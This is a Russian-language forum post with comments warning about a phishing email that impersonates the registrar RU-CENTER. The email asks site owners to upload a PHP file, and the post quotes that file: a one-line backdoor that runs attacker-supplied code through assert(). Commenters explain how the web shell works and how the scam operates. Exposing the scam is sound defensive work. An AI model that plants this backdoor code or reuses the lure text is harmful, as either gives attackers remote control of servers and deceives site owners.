17.04.2018 13:32
achekalin 33 11100 Источник
Давно мне не попадалось такого красивого социального развода на действие (см. под катом). На фоне истории с блокировками и вообще затягивания гаек тем более приятно видеть, что кто-то сумел суровым тоном такое написать — ведь отдельные граждане и поведутся!

image

Мне думается, shared хостингам пора начинать фильтровать передаваемые в скрипты переменные, хотя имя переменной, уверен, в каждом случае разное.

Получил в ящике, заведенном для административных целей, письмо якобы от имени RU-CENTER, со следующим текстом:

Уважаемый клиент!

В соответствии с изменениями, внесенными в ICANN RAA, Вы должны подтвердить, что управление доменным именем domain.ru осуществляется лицом, указанным в качестве его администратора.

Чтобы подтвердить, что Вы имеете фактическую возможность управлять доменом, создайте в корневой директории сайта файл kk4tamko17q83015.php со следующим содержимым:

<?php
assert(stripslashes($_REQUEST[JJIZS]));
?>

Файл должен быть создан в течение трех календарных дней с момента получения настоящего сообщения и присутствовать на сервере до 30 апреля 2018 года, 07:00 (UTC+03:00), в противном случае процедура верификации не будет пройдена.

Обращаем Ваше внимание на то, что если процедура подтверждения не будет пройдена, обслуживание домена будет завершено.
Письмо красиво оформлено в классическом стиле письмо и сайта nic.ru, так что внешне все выглядит весьма прилично.

По-моему, просто прекрасная акция с использованием социальной инженерии!

Комментарии (33)


  1. token
    17.04.2018 16:38
    #10758534
    +1

    А если у меня сайт на бэйсике написан, что тогда делать?


    1. Tenebrius
      17.04.2018 16:48
      #10758570
      +3

      А какая разница на чем сайт? Будет запрос на определенный файл, большинство хостингов исполнение php-скриптов поддерживают.

      P.S. большинство хостингов, которыми пользуются те, на кого развод подействует.


    1. dreesh
      17.04.2018 16:57
      #10758592

      ну наверное «хакер» перед отправкой проверит возможность исполнения пэхэпэ)
      Хотя судя по содержимому скрипта который нужно создать… похоже на «хакеров» из вк которые отправляют «вирус» для подмены доменов в hosts файле…


      1. mayorovp
        17.04.2018 19:26
        #10758974

        А что не так с содержимым скрипта?


        1. wataru
          17.04.2018 20:17
          #10759076
          +1

          Я не настоящий сварщик пхп-кодер, но похоже, что там тупо выполняется скрипт переданный как параметр в запросе. Т.е. это готовый шелл.


          1. mayorovp
            17.04.2018 20:23
            #10759090

            Ну да, так и есть…


  1. KYuri
    17.04.2018 16:45
    #10758556
    +1

    «Вы должны подтвердить, что управление доменным именем domain.ru осуществляется лицом, указанным в качестве его администратора.»
    И как размещение файлика может в принципе подтвердить, что управление доменом осуществляется Ивановым Иваном Ивановичем, а не Петровым Петром Петровичем?
    Я не знаю, как на такое можно повестись.


    1. kalininmr
      17.04.2018 21:36
      #10759260
      +1

      ну, например, у яндеков с гуглов есть такое же подтверждение(создание файла) что это твой домен


      1. KYuri
        17.04.2018 21:43
        #10759276
        +1

        Не путайте. «яндексы и гуглы» проверяют, что к ним («яндексам и гуглам») обращается человек, имеющий права на управления доменом.
        Тот ли это человек, который указан в качестве администратора, или совсем другой, «яндексов и гуглов» не волнует.


        1. kalininmr
          17.04.2018 23:42
          #10759490

          тоже верно


  1. LoadRunner
    17.04.2018 16:48
    #10758572
    +1

    Эм… Простите за мой французский, но это же лютый боян и даже сам RU-CENTER рассылал письма-предупреждения, что есть такой развод и не ведитесь на него.


  1. tvr
    17.04.2018 16:51
    #10758580
    +1

    Пфф, каждое утро в почте вижу попытки развода — то квитанции

    Типа
    Thank you.
    You've made a purchase from Battle Bay on App Store.

    Order number: APP.7419-9040-3156-01951
    Order date: April 17, 2018 01:47:50 AM EDT
    Item Price
    Mug Of Pearls — Get resources, skip waiting with 1,200 pearls US$10.99
    Total: US$10.99
    (Includes TAX of US$0.99)
    Payment method:
    iPay
    It's not you? Cancel Payment


    1. achekalin Автор
      17.04.2018 16:58
      #10758596

      Везет вам! Или антиспам не работает?


      1. tvr
        17.04.2018 17:19
        #10758638

        Работает, но иногда проскакивают такие послания. С начала апреля примерно начались.


    1. Dreyk
      17.04.2018 23:11
      #10759452

      первое похоже на валидный чек, просто не ваш =)


      1. tvr
        18.04.2018 11:43
        #10760358

        Угу, очень похоже. Когда это мне первый раз пришло, я аж напрягся и чуть не полез в онлайн-банк последние операции смотреть. Потом пригляделся внимательнее, увидел внизу «It's not you? Cancel Payment» — сходите по ссылочке и отмените платёж, выдохнул и продолжил читать Хабр. Приходит эта дрянь теперь пару раз в неделю.


  1. Loki3000
    17.04.2018 17:15
    #10758630

    Аж от 16 года запись...


  1. Nick_Shl
    17.04.2018 18:37
    #10758806
    +1

    Для тех кто не в теме, не мешало бы в статье дать краткие пояснения, что делает этот код. Понятно, что злоумышленник потом впишет путь к этому файлу на сайте в браузер, но вот что он увидит?


    1. n1ger
      17.04.2018 18:50
      #10758858

      Да прям на хабре почитайте, что это и зачем.
      habrahabr.ru/post/138443


    1. mayorovp
      17.04.2018 19:30
      #10758984

      assert в PHP работает как eval — исполняет произвольный код если ему передать строку. Если кто-то последует этому совету — злоумышленник получит универсальный бэкдор.


  1. glowingsword
    17.04.2018 22:42
    #10759402

    Да это старая как мир разводка. Текст писем меняется, переменные меняются, бывает что код скрипта немного меняют(в одной версии заюзан base64(а иногда и gzip), в другой нет, в одной eval, в другой assert и т.п.) — но суть всех этих разводок и логика работы скрипта всегда одна и та же. Верояно, это какие-то скрипт-кидди уже не один год так развлекаются. Странно, что люди до сих пор ведутся на этот трюк и сами добавляют бэкдорчик на свой сайт. Социнжиниринг — это сила.


    1. achekalin Автор
      17.04.2018 23:26
      #10759462

      Согласен. Но в этом случае был поражен наглостью. И ведь ничего им не предъявишь на этом этапе: тебе прислали код, ты его сам выложил. Они станут редисками, когда через этот код заставят твой сервер что-не то делать, но и то — юридически тебя просто ввели в заблуждение, но пустил-то ты их сам!


      1. glowingsword
        17.04.2018 23:51
        #10759500

        Верно, на удивление нахраписто действуют парни. И предъявить им что-то не просто, как правило они код дёргают не напрямую со своего хоста, а через цепочку проксиков(подозреваю, что это поломанные ими VPS-ки вполне добропорядочных граждан). Что-бы таких товарищей отловить, нужно целую спец-операцию произвести с участием правоохранительных органов, хостеров на чьих серваках крутятся вломанные услуги заюзанные для проксирования и пострадавшими лицами, получившими подобные письма. Времени и сил это потребует немало, а на выходе будут пойманы нескольк скрипт-кидди. IMHO, но с точки зрения правоохранительных органов овчинка выделки не стоит.


  1. HaZeR
    17.04.2018 23:27
    #10759466

    Баянище. Если есть настроение, можно по логам посмотреть откуда дергается проверка и что передают(спойлер — первый запрос безобидный). Можешь абуз хостеру отправить(не забудь приложить текст письма и логи). Реагируют адекватно.
    ЗЫ Автор не видел реально красивых разодов.


    1. achekalin Автор
      17.04.2018 23:28
      #10759468

      Готов поверить, что не видел. Не везло — или всё же везло?

      А можно попросить рассказать?


  1. maaGames
    18.04.2018 07:46
    #10759886

    Я бы повёлся, если просили разместить html документ. Хотя, скорее всего, сперва бы написал в техподдержку хостера.
    А вот php файл не стал бы добавлять точно.


    1. achekalin Автор
      18.04.2018 09:59
      #10760050

      А если бы РКН «попросил» разместить, но именно подобный файл PHP?


      1. maaGames
        18.04.2018 11:37
        #10760336

        «Ключи шифрования — это, в первую очередь, желание соблюсти закон...» и т.д.
        У меня хостинг в России, поэтому у меня просто не будет выбора. И, придётся переносить хостинг.)


        1. achekalin Автор
          18.04.2018 11:40
          #10760348

          А как же «не сдает ключи тот, кому нечего скрывать»? Шутка.

          Я смотрю, сейчас отличная тема для части контор уйти за границу, а для части — придти в Россию с Амазона.


          1. maaGames
            18.04.2018 11:46
            #10760372

            У меня «уникальная» ситуация, которую не касается Я-пакет. Ни регистрации пользователей, ни чатов, ни прочего. Я вообще мог бы обойтись страничкой в ВК (она итак есть) или лэндингом в какой-нибудь бесплатной народной помойке. Даже от https отказался из-за отсутствия необходимости. Так что, конкретно в моём случае, когда нет ни коммерческой тайны, ни данных пользователей, ни паролей, ни прочего, я совершенно спокойно дам доступ любым правоохранительным структурам, если попросят. Потому что мне нечего скрывать от слова «вообще». В любой другой ситуации — однозначный перенос хостинга на неподконтрольные сервера. Возможно и перенос домена из зоны ru.


  1. Raftko
    18.04.2018 11:43
    #10760360

    Можно выложить файл с таким именем, но только код поменять и вывести:

    <? echo "Ваш айпи адрес ".$_SERVER['REMOTE_ADDR']." был записан. Ваша попытка атаки зарегистрирована. Направили заявление в правохранительные органы для уточнения вашей личности. Ждите наряд и не покидайте место преступления"; ?>

    Учитывая уровень «хакерской атаки» можно заставить поволноваться уже «хакеров».


    1. achekalin Автор
      18.04.2018 11:45
      #10760370

      Думаете, они глазами ответ сервера читают? Просто три дня сканят по кругу все домены, кому послали письмо, где есть ответ, там проверка, что шел «пошёл», и передача хоста для дальнейшей эксплуатации шела на следующий шаг.

      Хозяин робота при этом сидит на Канарах в школе и ответов вашего сервера точно не читает. *смайлик*


      1. Raftko
        18.04.2018 11:54
        #10760398

        Это как вариант, а может робот просто собирает места где шелл прошёл и потом злоумышленник уже делает что хочет в ручную. В любом случае тут и трудозатраты небольшие.